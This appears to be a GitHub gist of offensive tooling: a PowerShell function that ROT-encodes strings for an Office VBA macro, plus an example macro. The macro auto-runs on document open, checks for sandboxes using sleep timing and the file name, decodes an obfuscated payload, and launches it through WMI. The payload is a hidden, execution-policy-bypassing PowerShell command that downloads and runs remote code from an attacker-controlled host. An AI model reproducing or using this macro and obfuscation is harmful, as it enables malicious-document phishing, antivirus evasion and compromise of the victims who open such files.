Created
September 13, 2024 08:06
-
-
Save jakobfriedl/00420f6a647f9f56d87a8d7c09169369 to your computer and use it in GitHub Desktop.
Obfuscate VBA strings for evasion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function ObfuscateString($inputString, $rotKey) { | |
| [string]$output = "" | |
| $inputString.ToString().ToCharArray() | %{ | |
| [string]$thischar = [byte][char]$_ + $rotKey | |
| if($thischar.Length -eq 1) { | |
| $thischar = [string]"00" + $thischar | |
| $output += $thischar | |
| } | |
| elseif($thischar.Length -eq 2) { | |
| $thischar = [string]"0" + $thischar | |
| $output += $thischar | |
| } | |
| elseif($thischar.Length -eq 3) { | |
| $output += $thischar | |
| } | |
| } | |
| return $output | |
| } | |
| ## Useage: ObfuscateString <string> <rot key> | |
| ObfuscateString "winmgmts:" 12 | |
| ObfuscateString "app.docm" 12 | |
| ObfuscateString "Win32_Process" 12 | |
| ObfuscateString "powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/run.txt')" 12 | |
| ## Example usage in Office macro | |
| # Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long | |
| # Sub Document_Open() | |
| # MyMacro | |
| # End Sub | |
| # Sub AutoOpen() | |
| # MyMacro | |
| # End Sub | |
| # Function Grass(Goats) | |
| # Grass = Chr(Goats - 12) ' 12 = ROT key | |
| # End Function | |
| # Function Screen(Grapes) | |
| # Screen = Left(Grapes, 3) | |
| # End Function | |
| # Function Gorgon(Topside) | |
| # Gorgon = Right(Topside, Len(Topside) - 3) | |
| # End Function | |
| # Function Yellow(Troop) | |
| # Do | |
| # Shazam = Shazam + Grass(Screen(Troop)) | |
| # Troop = Gorgon(Troop) | |
| # Loop While Len(Troop) > 0 | |
| # Yellow = Shazam | |
| # End Function | |
| # Function MyMacro() | |
| # Dim Apples As String | |
| # Dim Leap As String | |
| # Dim t1 As Date | |
| # Dim t2 As Date | |
| # Dim time As Long | |
| # t1 = Now() | |
| # Sleep (5000) | |
| # t2 = Now() | |
| # time = DateDiff("s", t1, t2) | |
| # If time < 4.5 Then | |
| # Exit Function | |
| # End If | |
| # ' Obfuscated file name (generated by PowerShell script) | |
| # If ActiveDocument.Name <> Yellow("109124124058112123111121") Then | |
| # Exit Function | |
| # End If | |
| # ' Obfuscated payload (generated by PowerShell script) | |
| # Apples = "129128136118131132121118125125049062118137118116049115138129114132132049062127128129049062136049121122117117118127049062116049122118137057057127118136062128115123118116133049132138132133118126063127118133063136118115116125122118127133058063117128136127125128114117132133131122127120057056121133133129075064064066074067063066071073063066066074063066067065064115128128124063133137133056058058" | |
| # Leap = Yellow(Apples) | |
| # ' First string: "winmgmts:" | |
| # ' Second string: "Win_32Process' | |
| # GetObject(Yellow("131117122121115121128127070")).Get(Yellow("099117122063062107092126123111113127127")).Create Leap, Tea, Coffee, Napkin | |
| # End Function |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment